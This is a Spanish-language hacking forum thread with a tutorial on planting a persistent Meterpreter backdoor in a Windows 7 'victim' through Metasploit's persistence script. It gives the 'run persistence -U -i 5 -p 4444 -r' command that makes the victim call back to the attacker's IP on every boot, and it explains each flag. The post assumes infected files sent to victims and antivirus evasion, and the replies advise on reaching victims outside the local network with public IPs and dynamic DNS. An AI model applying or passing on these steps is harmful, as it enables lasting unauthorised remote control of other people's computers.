Creando Backdoor Persistente en metasploit

Iniciado por BrowserNet, Diciembre 04, 2016, 12:18:02 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Diciembre 04, 2016, 12:18:02 AM Ultima modificación: Marzo 03, 2017, 05:41:27 PM por puntoCL


Saludos fieles lectores en esta oportunidad les traigo un POST sobre como crear tu Backdoor persistente en msfconsole, ha pedido de un seguidor del blog que me dejo un mensaje en privado.

¿Que es Backdoor?

se le domina como puerta trasera, cabe decir que se ejecuta un "Script" remoto a la maquina de la victima con conexion puente al ordenador del atacante, para dejar al sistema vulnerado en escucha siempre.

El Backdoor persistente es compatible con todas las versiones de Windows.

Lo primero que deben tener en cuenta es lo siguiente, penetrar el sistema de tu victima, dejo los siguientes posts donde enseño como hacerlo por diferentes métodos, de igual manera burlar los "AV":


Luego de crear tu "Payload", posteriormente enviar el archivo infectado a tu victima tendremos su session meterpreter, en este caso haré la prueba de concepto en un Windows 7 service pack 1



Entonces lo que haremos sera ejecutar el comando persistente por default.
Código: php

meterpreter > run persistence

voy a dejar bien claro lo siguiente, al ejecutar el comando run persistente estas dejando todo por Default, por ejemplo:

El puerto: 4444
IP: 192.168.1.35 (tu IP se adjuntara automáticamente)
Script Upload - directorio donde se alojara el Script vbs, que se ejecutara al momento que inicie el sistema de la victima.



Como vemos el archivo se subió correctamente en la carpeta por default.



Entonces reiniciaremos el equipo de la victima para ver si realmente nos carga  su sesión meterpreter, pero antes configuraremos el puerto de escucha, ya que en la infección se utilizo el puerto 5555.



Esperemos que cargue nuevamente el sistema windows, pero vemos en la siguiente imagen que hemos cambiado el puerto de escucha reemplazando el 5555 a 4444 que fue generado al momento de ejecutar persistence.



Como podemos observar automáticamente hemos tenido la conexión meterpreter.

ahora viene la pregunta de muchos:

¿si yo deseo establecer una IP y puerto diferente?

Pues sencillo vamos a utilizar algunos argumentos de persitence, un ejemplo es el siguiente:

Código: php
run persistence -U -i 5 -p 4444 -r 192.168.1.35


-U >> ejecuta automáticamente el usuario comprometido y establece logs.
-i  >> segundos de conexión para establecer. 
-p >> puerto de escucha.
-r >> IP de la maquina del atacante a añadir.




Entonces le añadí de igual manera el puerto 4444, y deje mi IP estatica por default, ya que es mi maquina de ataque:

Reinicie bruscamente el windows 7, entonces esperaremos a que cargue nuevamente.   



de igual manera hemos tenido su sesión meterpreter automáticamente, configurando nuestro propio script persistente.

Enero 02, 2017, 08:06:34 PM #1 Ultima modificación: Enero 02, 2017, 09:17:01 PM por Stiuvert
Vaya,soy nuevo en esto y nunca me imagine que fuera tan rápido y fácil  :D.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vaya,soy nuevo en esto y nunca me imagine que fuera tan rápido y fácil  :D.

Agradecería mi vista otro color de fuente, si es facil pero lamentablemente hasta el Avast Free te detectaría este Backdoor  :P

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
amigo disculpe tambien estoy interesado en el  curso. la pregunta es ,si conseguiste los links ,por que a my tampoco me funcionan

yo te recomiendo esto No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

como configurarlo si es para fuera de lan? porque eso en la misma red

Colocas tu ip publica y abris los puertos. O usas no-ip y vinculas a esa direccion.
Pikaa~


PikachuDorado puedes explicarme como crear una ip estatica para poder conectarme con la maquina remota y no se pierda la comunicación cuando se reinicie mi computadora?
... De las piedras y el aire no proviene el concepto de lo que es bueno y lo que es malo, de la no vida no puede surgir vida.

crear ip estatica no podes, eso te lo da el proveedor de internet lo que podes hacer es usar un dynamic dns como no-ip, dtdns o el que quieras

mi pregunta es como puedo conseguir la ip de una computadora si esa pc esta muy lejos o esta en otro pais

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
crear ip estatica no podes, eso te lo da el proveedor de internet lo que podes hacer es usar un dynamic dns como no-ip, dtdns o el que quieras

no-ip  ya no se usa para esos fines , si no quieres el fbi en tu puerta :v